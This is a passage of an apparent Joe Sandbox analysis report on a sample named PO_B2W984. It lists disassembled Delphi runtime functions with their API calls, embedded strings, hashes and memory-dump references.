                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoLocale
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2299586839-0
                                                                                                                                        • Opcode ID: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                        • Instruction ID: 9186296488ea05fbad127abae63c5d120e0e45f87761990acb2824bda7d9fb4d
                                                                                                                                        • Opcode Fuzzy Hash: 247628b8c1feb2e7e236466855a8f0c303f798d01677e0f323818b1e94eef0a4
                                                                                                                                        • Instruction Fuzzy Hash: 6FD05EAA30E6A03AA220915A2D84D7B5AFCCAC57A1F00807EF588C6300D204CC05D6F1
                                                                                                                                        Function 02DD918C Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 481472006-0
                                                                                                                                        • Opcode ID: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                        • Instruction ID: eaab84ad9bc3567071d0163a5fc3ae38943ab10a6fbb6f89fea695eb50e734e0
                                                                                                                                        • Opcode Fuzzy Hash: 826dc02cb97be1f30314bd8e5388bcaace96657751e1fb4d4dbee66b4f4147a3
                                                                                                                                        • Instruction Fuzzy Hash: AFA01108808C20028A803B280C0223A3088A800A20FC80F80A8F8803E0EE2E8A2080E3
                                                                                                                                        Function 02DD20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                        • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                        • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                        • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                        Function 02DDD214 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 02DDD21D
                                                                                                                                          • Part of subcall function 02DDD1E8: GetProcAddress.KERNEL32(00000000), ref: 02DDD201
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                        • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                        • API String ID: 1646373207-1918263038
                                                                                                                                        • Opcode ID: b24ae43bbb3ef637a519c75764fc19d11d437f4a66882346e8e09617da90da9a
                                                                                                                                        • Instruction ID: f23d3bf752105fea88a72eb518a92acae910513a636117988e0f48bb24fe71af
                                                                                                                                        • Opcode Fuzzy Hash: b24ae43bbb3ef637a519c75764fc19d11d437f4a66882346e8e09617da90da9a
                                                                                                                                        • Instruction Fuzzy Hash: 6E41B463AD4A0C5F9E086AAE78044677BAFE788711BE0441FF41CCB744DE20BD919E79
                                                                                                                                        Function 02DE6E58 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(ole32.dll), ref: 02DE6E5E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 02DE6E6F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 02DE6E7F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 02DE6E8F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 02DE6E9F
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 02DE6EAF
                                                                                                                                        • GetProcAddress.KERNEL32 ref: 02DE6EBF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                        • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                                        • API String ID: 667068680-2233174745
                                                                                                                                        • Opcode ID: 4bc62594737b6ec77ed478ef6a0a4f5b13c56f7dff77628337c21925eb95ff84
                                                                                                                                        • Instruction ID: 46b0cf093c1d35c5de29b83978bde85653c5862471fa3f5fc27a6f1edb042ecd
                                                                                                                                        • Opcode Fuzzy Hash: 4bc62594737b6ec77ed478ef6a0a4f5b13c56f7dff77628337c21925eb95ff84
                                                                                                                                        • Instruction Fuzzy Hash: 21F0ACA8A8C7916EFB407F70FC8292B3B5ED530A04B0058A5B50359742DAB5DC184FF8
                                                                                                                                        Function 02DD2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 02DD28CE
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message
                                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                                        • API String ID: 2030045667-32948583
                                                                                                                                        • Opcode ID: 8decf439a24b4871940ce7f0b791c8976f88c4c945108fbe64598af1d99e79ee
                                                                                                                                        • Instruction ID: ab466a50c7faaaaccbdf472c6ecf01e3e23a103df14d9b16679b865cd8183cfd
                                                                                                                                        • Opcode Fuzzy Hash: 8decf439a24b4871940ce7f0b791c8976f88c4c945108fbe64598af1d99e79ee
                                                                                                                                        • Instruction Fuzzy Hash: 41A1E730A047948BDB21AA2CCC88B99B6E5EB09350F1441E5DD499B387CB759DC9CF61
                                                                                                                                        Function 02DD252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        • The sizes of unexpected leaked medium and large blocks are: , xrefs: 02DD2849
                                                                                                                                        • An unexpected memory leak has occurred. , xrefs: 02DD2690
                                                                                                                                        • bytes: , xrefs: 02DD275D
                                                                                                                                        • Unexpected Memory Leak, xrefs: 02DD28C0
                                                                                                                                        • The unexpected small block leaks are:, xrefs: 02DD2707
                                                                                                                                        • , xrefs: 02DD2814
                                                                                                                                        • 7, xrefs: 02DD26A1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                                        • API String ID: 0-2723507874
                                                                                                                                        • Opcode ID: f4f8972f695a90c5ee9e526ad140149f8006527f3b86a6e2ef1a74cf990952be
                                                                                                                                        • Instruction ID: 4f70e3fbea8b93968d6acca892fe3910b3efa1068baf2297163c0121a12cee86
                                                                                                                                        • Opcode Fuzzy Hash: f4f8972f695a90c5ee9e526ad140149f8006527f3b86a6e2ef1a74cf990952be
                                                                                                                                        • Instruction Fuzzy Hash: 9571C530A046988FDB319A2CCC88BD9BAE5EB09714F5041E5D949D7383DB758EC5CF61
                                                                                                                                        Function 02DDBD40 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetThreadLocale.KERNEL32(00000000,02DDC00B,?,?,00000000,00000000), ref: 02DDBD76
                                                                                                                                          • Part of subcall function 02DDA744: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02DDA762
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Locale$InfoThread
                                                                                                                                        • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                        • API String ID: 4232894706-2493093252
                                                                                                                                        • Opcode ID: db0daa7cc2df13e18052742ad6390b175e13dfb1898e76905786d8802d372cd1
                                                                                                                                        • Instruction ID: b181894bb4eca4815c02796967b29fbf2a97bc403fd111841fc60edbc0f7f8c3
                                                                                                                                        • Opcode Fuzzy Hash: db0daa7cc2df13e18052742ad6390b175e13dfb1898e76905786d8802d372cd1
                                                                                                                                        • Instruction Fuzzy Hash: 66615E34B50A48ABDB05EBA4D850B9FB7BBDF88304F60D436A101AB345DA39DD05DBB0
                                                                                                                                        Function 02DEAE18 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEAE38
                                                                                                                                        • GetModuleHandleW.KERNEL32(KernelBase,LoadLibraryExA,?,00000004,?,00000014), ref: 02DEAE4F
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000004), ref: 02DEAEE3
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000002), ref: 02DEAEEF
                                                                                                                                        • IsBadReadPtr.KERNEL32(?,00000014), ref: 02DEAF03
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Read$HandleModule
                                                                                                                                        • String ID: KernelBase$LoadLibraryExA
                                                                                                                                        • API String ID: 2226866862-113032527
                                                                                                                                        • Opcode ID: 80d8cbae50d1cb3fe38f79d90bb7f850df3f4d8ff762d321582f2c91f2967e4e
                                                                                                                                        • Instruction ID: 82d6934b3936d7aaaa799fb14a307c0906f0e689cb02937fe8572062069bf403
                                                                                                                                        • Opcode Fuzzy Hash: 80d8cbae50d1cb3fe38f79d90bb7f850df3f4d8ff762d321582f2c91f2967e4e
                                                                                                                                        • Instruction Fuzzy Hash: 613119B6A40206BBDF20EB68DC85F5A77A8EF05768F044550EA56EB3C0D770ED40DBA1
                                                                                                                                        Function 02DD432C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?,02E307C8,?,?,02DFD7A8,02DD655D,02DFC30D), ref: 02DD4365
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?,02E307C8,?,?,02DFD7A8,02DD655D,02DFC30D), ref: 02DD436B
                                                                                                                                        • GetStdHandle.KERNEL32(000000F5,02DD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?,02E307C8), ref: 02DD4380
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F5,02DD43B4,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,02DD43F3,?,?), ref: 02DD4386
                                                                                                                                        • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 02DD43A4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHandleWrite$Message
                                                                                                                                        • String ID: Error$Runtime error at 00000000
                                                                                                                                        • API String ID: 1570097196-2970929446
                                                                                                                                        • Opcode ID: da0e17cd9ba312b33d09c5d826ad270a7eef381f6964e1767c96245445169a18
                                                                                                                                        • Instruction ID: 9e9aade0a2a8dc555847e357a342d19404a7bcbaa2801255003286378a8b7951
                                                                                                                                        • Opcode Fuzzy Hash: da0e17cd9ba312b33d09c5d826ad270a7eef381f6964e1767c96245445169a18
                                                                                                                                        • Instruction Fuzzy Hash: 59F09662AC475075F720A6A4BC46F59275DC744B14F584A04B36A682C187B0BCCDDB3A
                                                                                                                                        Function 02DDAE44 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 02DDACBC: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02DDACD9
                                                                                                                                          • Part of subcall function 02DDACBC: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02DDACFD
                                                                                                                                          • Part of subcall function 02DDACBC: GetModuleFileNameA.KERNEL32(02DD0000,?,00000105), ref: 02DDAD18
                                                                                                                                          • Part of subcall function 02DDACBC: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02DDADAE
                                                                                                                                        • CharToOemA.USER32(?,?), ref: 02DDAE7B
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02DDAE98
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DDAE9E
                                                                                                                                        • GetStdHandle.KERNEL32(000000F4,02DDAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DDAEB3
                                                                                                                                        • WriteFile.KERNEL32(00000000,000000F4,02DDAF08,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02DDAEB9
                                                                                                                                        • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02DDAEDB
                                                                                                                                        • MessageBoxA.USER32(00000000,?,?,00002010), ref: 02DDAEF1
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 185507032-0
                                                                                                                                        • Opcode ID: 36bca8bef6ec4fbdba92eec533cb542f60865aea81de3e42b2eec080295a9c52
                                                                                                                                        • Instruction ID: 955aa6a9f5c596fa249957b39f4ac8e898ec2aadaf134bf152e6378fc6c88cc1
                                                                                                                                        • Opcode Fuzzy Hash: 36bca8bef6ec4fbdba92eec533cb542f60865aea81de3e42b2eec080295a9c52
                                                                                                                                        • Instruction Fuzzy Hash: 7D1170B65886047AD200EBA4DC84F9F77EDEB44300F40495AB755D62D0DA70ED488FF6
                                                                                                                                        Function 02DDE50C Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02DDE5A5
                                                                                                                                        • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02DDE5C1
                                                                                                                                        • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02DDE5FA
                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02DDE677
                                                                                                                                        • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02DDE690
                                                                                                                                        • VariantCopy.OLEAUT32(?,00000000), ref: 02DDE6C5
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 351091851-0
                                                                                                                                        • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                        • Instruction ID: 4230a1e3d6f6229bed32cb3982ce5e6c3e4c99a20a39df6fe35dd904d2cf301e
                                                                                                                                        • Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                                        • Instruction Fuzzy Hash: 0B51ED76940A299BCB22DB68CC80BD9B3BDEF4D304F0445D5E609AB341DA30AF858F60
                                                                                                                                        Function 02DD3568 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DD358A
                                                                                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02DD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DD35BD
                                                                                                                                        • RegCloseKey.ADVAPI32(?,02DD35E0,00000000,?,00000004,00000000,02DD35D9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02DD35D3
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.22968835532.0000000002DD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.22968766664.0000000002DD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22968997541.0000000002DFD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969211170.0000000002E31000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F25000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.22969259445.0000000002F28000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_2dd0000_PO_B2W984.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                        • API String ID: 3677997916-4173385793
                                                                                                                                        • Opcode ID: fb2526fa1594f2f6fa983b35539bcbc93f8a3b442016c6495bb7f3c8a884a9cc
                                                                                                                                        • Instruction ID: c5719e73e599a7a1e6e478f5ae43519819f16b62bd67d46a0aca942124336689
                                                                                                                                        • Opcode Fuzzy Hash: fb2526fa1594f2f6fa983b35539bcbc93f8a3b442016c6495bb7f3c8a884a9cc
                                                                                                                                        • Instruction Fuzzy Hash: 5901F575A40648BAE710DBD09C02BBD77ECD708701F2005A1BA04E6780E675DE10CF69
                                                                                                                                        Function 02DE80C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02DE8148,?,?,00000000,00000000,?,02DE8061,00000000,KernelBASE,00000000,00000000,02DE8088), ref: 02DE810D
